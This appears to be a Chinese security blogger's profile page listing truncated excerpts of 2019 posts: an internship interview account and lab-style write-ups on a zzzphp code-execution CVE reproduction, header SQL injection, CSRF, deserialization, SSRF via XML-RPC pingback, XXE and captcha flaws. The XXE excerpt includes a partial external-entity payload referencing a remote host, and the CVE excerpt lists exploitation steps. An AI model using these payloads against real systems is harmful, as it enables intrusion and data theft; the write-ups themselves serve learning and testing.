Track 实习学员

18534715561

2关注
0粉丝
36文章
返回网站首页

您已发布 36篇文章作品写文章

山西太原晋信安科技有限公司web渗透实习生面试贴分享

所面试公司:晋信安科技有限公司工资待遇:不方便透露,很低所在城市:太原面试岗位:web渗透实习生面试过程:我是一个刚上完大一的学生,所以对面试的不抱有太大的希望,之前在boss上投了七八分简历但是都拒绝了我,之后我又投了一轮简历。虽然我的面试简历里面写的很详细,比如什么xss,SQL注入,msf......各种各样的工具原理都会使用和了解,而且也经常关注安全平台,经常将新爆出的漏洞进行代码审计与复

 2019-7-12
 1 
 499 

CVE-2019-12858:zzzphp v1.6.6 任意代码执行复现

看到一个后台代码执行便来了兴趣,来复现一下。利用方法:1.登陆后台修改缓存文件内容。后台 —> 静态缓存 —> 缓存列表 —> 后台缓存 —> 修改 f6f373570fe983d7f5ea813871d99f6d 2.访问http://xxxxx/adminxxx/?usergrouplist利用成功代码审计:1.后台的代码   &

 2019-7-3
 0 
 1160 

SQL注入-Header注入Rank 1

6.5.1:   1.先正式登陆,看页面的变化          发现返回请求的ua头,ip。     2.尝试在ua头进行注入      类似get和post注入,首先ua头加一个引号。       &nbs

 2019-6-25
 0 
 423 

点击就送屠龙宝刀

9.4、CSRF跨站伪造请求CSRF(Cross-site request forgery)跨站请求伪造:也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相

 2019-6-25
 0 
 98 

unserialize反序列化漏洞

1.首先定义一个类 readme  当这个类被当做字符串对待时,则会调用读取Readme.txt,而这个文件里面的内容就是flag in ./flag.php分析 get传参部分如果存在 source的传参,那么就会初始化类,调用类的source方法,这个方法就是以highlight_file的方法将Readme.txt显示出来分析cookie如果存在todos的cookie传参,将传参

 2019-5-26
 0 
 255 

正则匹配靶场

1. <?php  $key='flag{********************************}'; $Regular= preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i", trim($_GET["id"]), $mat

 2019-5-25
 0 
 162 

ssrf漏洞利用

靶场给了提示就不用去爆破了:提示12388是88的转发端口1. XMLRPC中存在一个叫做Pingback协议,利用代码如下:<?xml version="1.0" encoding="utf-8"?><methodCall>   <methodName>pingback.ping</method

 2019-5-24
 0 
 172 

XXE实体注入

1.审计代码 发现有一处没有经过过滤直接拿过来使用可以看到$postStr  没有经过过滤,直接放入   simplexml_load_string   中使用,这样就造成了xxe2.http://117.41.229.122:8010/xxe/1.xml<!ENTITY % all"<!ENTITY % send SYSTE

 2019-5-24
 0 
 394 

验证码漏洞

1. 百度相关cms的漏洞 ,有相关的知识2.根据提示,找到链接,打开看到是一个密码找回漏洞审计代码得知一点东西得知是从 10到10000 随机选取一个数当作验证码if ($Type=="fintpassword") 这个模块是邮箱验证码的生成模块,检验模块,先使用语句来判断邮箱的正确与否,  之后将验证码和邮箱插入数据库  最后通过 elseif ($Ty

 2019-5-22
 0 
 94